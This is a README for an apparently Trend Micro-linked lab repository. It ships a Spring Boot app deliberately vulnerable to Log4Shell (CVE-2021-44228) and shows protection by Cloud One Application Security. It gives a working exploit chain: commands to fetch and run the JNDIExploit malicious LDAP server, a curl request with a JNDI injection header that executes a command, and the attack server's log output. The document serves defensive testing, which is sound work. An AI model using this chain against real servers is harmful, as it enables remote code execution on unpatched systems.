Log4Shell sample vulnerable application (CVE-2021-44228), protected by Cloud One Application Security
This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell, and was modified to add Trend Micro's Cloud One Application Security agent to demonstrate technique-based web application protection to this vulnerability.
It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181.
Build it yourself (you don't need any Java-related tooling):
docker build . -t log4shell-vulnerable-app-c1as
docker run --rm -d -p 8080:8080 --name log4shell-vulnerable-app-c1as log4shell-vulnerable-app-c1asNote: This is highly inspired from the original LunaSec advisory. Run at your own risk, preferably in a VM in a sandbox environment.
- Use JNDIExploit to spin up a malicious LDAP server
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip #(looks down, try https://transfer.sh/puxohI/JNDIExploit.v1.2.zip)
unzip JNDIExploit.v1.2.zip
nohup java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888 &- Then, trigger the exploit using:
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'- Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119 /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
- To confirm that the code execution was successful, notice that the file
/tmp/pwned.txtwas created in the container running the vulnerable application:
$ docker exec vulnerable-app ls /tmp
...
pwned
...
This assumes you have already integrated the agent to your application.
- Log into Trend Micro Cloud One and navigate to Application Security.
- Select "Group's Policy" on the left-hand menu and find your application's Group.
- Enable "Remote Command Execution" if not already enabled.
- Click the hamburger icon for "Configure Policy" and then click the " < INSERT RULE > " icon.
- Input
(?s).*in the "Enter a pattern to match" field and hit "Submit" and "Save Changes." - Double-check that "Mitigate" is selected in your "Remote Command Execution" line item.
https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/ https://success.trendmicro.com/solution/000289940 https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html
This is an Open Source community project. Project contributors may be able to help, depending on their time and availability. Please be specific about what you're trying to do, your system, and steps to reproduce the problem.
For bug reports or feature requests, please open an issue. You are welcome to contribute.
Official support from Trend Micro is not available. Individual contributors may be Trend Micro employees, but are not official support.